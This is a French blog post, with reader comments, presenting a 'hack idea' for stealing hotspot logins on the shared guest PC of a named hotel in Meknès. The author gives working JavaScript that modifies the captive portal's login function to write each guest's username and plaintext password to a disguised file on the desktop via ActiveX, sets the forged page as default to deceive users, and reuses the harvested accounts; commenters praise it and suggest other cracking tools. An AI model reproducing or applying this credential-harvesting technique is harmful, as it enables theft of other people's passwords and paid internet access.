Idées de hack .Idée N°2 : Hacker Un HOTSPOT en récupérons les Login et mot de passe

Dans cette deuxième idée je vais expliquer comment on peut récupérer les Login et mot de passe de connexion HotSpot sans snifing sans KeyLoger , pour se connecter à internet.

ibis-meknes-hotspot

L’hôtel ibis Meknès met a la disposition des utilisateurs un PC de bureau avec internet explorer pour un tarif de 60 DH pour une demie heure et 100 DH l’heur qui est extrêmement chère quand l’accès a l information et a l’internet est nécessaire et indispensable.

Prix wifi Ibis

Si vous n’avez pas de pc pour snifer les login et mot de passe qui sont dans ce cas précis cryptée a l’aide d un script JavaScript très utile pour crypter le mot de passe avant de l’envoyer . Il dispose de 4 fonction :

function hexMD5 (str)
function hexMD5w(str)
function b64MD5 (str)
function b64MD5w(str)
function calcMD5(str)

vous pouvez le télécharger sur : http://pajhome.org.uk/crypt/md5/3.0/md5-2.2alpha.js

L’idée est de stocker les informations d’authentification sur le pc lui-même et les récupérer âpres la connexion des utilisateurs qui son munie d un login et un mot de passe d’Access.

Comme je n ai pas d’outils à installer comme un Key loger j’ai décidé de

  1. Enregistrer la page d’authentifications html
  2. Modifier l’action Script du formulaire pour enregistrer les mots de passes avant de s’authentifier
  3. Lancer la page comme page par défaut pour tromper les utilisateurs

Pour coder un script qui enregistre les données de la page web sur le bureau il faut activer les contrôle ActiveX sous internet explorer outil > option internet > sécurité > Personnaliser le niveau>Contrôle ACtiveX

ActiveX

Cette action est très déconseillée pour l’utilisation normal mais nécessaire pour exécuter a bien cette attaque.

Sur la Page d authentification on retrouve le code :

function doLogin() {
document.sendin.username.value = document.login.username.value;
document.sendin.password.value = hexMD5(‘\155′ + document.login.password.value + ‘\010\147\337\136\064\226\371\272\364\277\015\362\110\360\173\037′);
document.sendin.submit();
}

Ce qui permet de coder le mot de passe avant de l’envoyer dans notre cas on va récupérer le mot de passe dans le fichier avant de le crypter donc on ajoute le code suivant avant l’envoi des informations

function doLogin() {

var fso=new ActiveXObject(« Scripting.FileSystemObject »); //Création du Système de fichier.
var otf=fso.OpenTextFile(« Presentation.txt », 8 ,true); //Ouverture du fichier « Presentation.txt »  //qu’on a cree sur le bureau pour ne pas attirer l’attention
otf.WriteLine(document.login.username.value); //Ecriture de la ligne « Login ».
otf.WriteLine(document.login.password.value); //Ecriture de la ligne « pass ».
otf.Close(); //Fermeture du fichier  » Presentation.txt »

document.sendin.username.value = document.login.username.value;
document.sendin.password.value = hexMD5(‘\155′ + document.login.password.value + ‘\010\147\337\136\064\226\371\272\364\277\015\362\110\360\173\037′);
document.sendin.submit();
}

Après l’authentification on récupère le fichier et on test les Combinaison ou il reste encore du temps de connexion.

temps de connexion

En ce qui me concerne il me reste 45 minutes

Tagged : ,

9 commentaires pour “Idées de hack .Idée N°2 : Hacker Un HOTSPOT en récupérons les Login et mot de passe”

  1. Nice post u have here :D Added to my RSS reader

  2. momkin i5tira9 jami3 chbakt antirinet bratile

  3. likir

  4. tres bel article…

  5. pas mal comme idée ;)

  6. Piracker Says:
    mai 18, 2010 at 9:40

    Ok pas mal a j’essairais et sinon pour ce qui est de Neuf Wifi, Free Wifi etc…
    ca fonctionne avec le meme hack? moi perso je suis plus pour l’utilisation de aircrack et airsnarf comme pour le crack de clé wep mais c’est un peu plus long a mettre en place

  7. vous pouvez mais les Hotspot sont souvent sans protection wep ou wap .

  8. Cela marche avec un hotspot neuf box sans risque ?
    Sachant que j’ai un anti virus de merde… =) merci bien

  9. utiliser backtrack et hack cette WIfi

Laisser un Commentaire






5 − deux =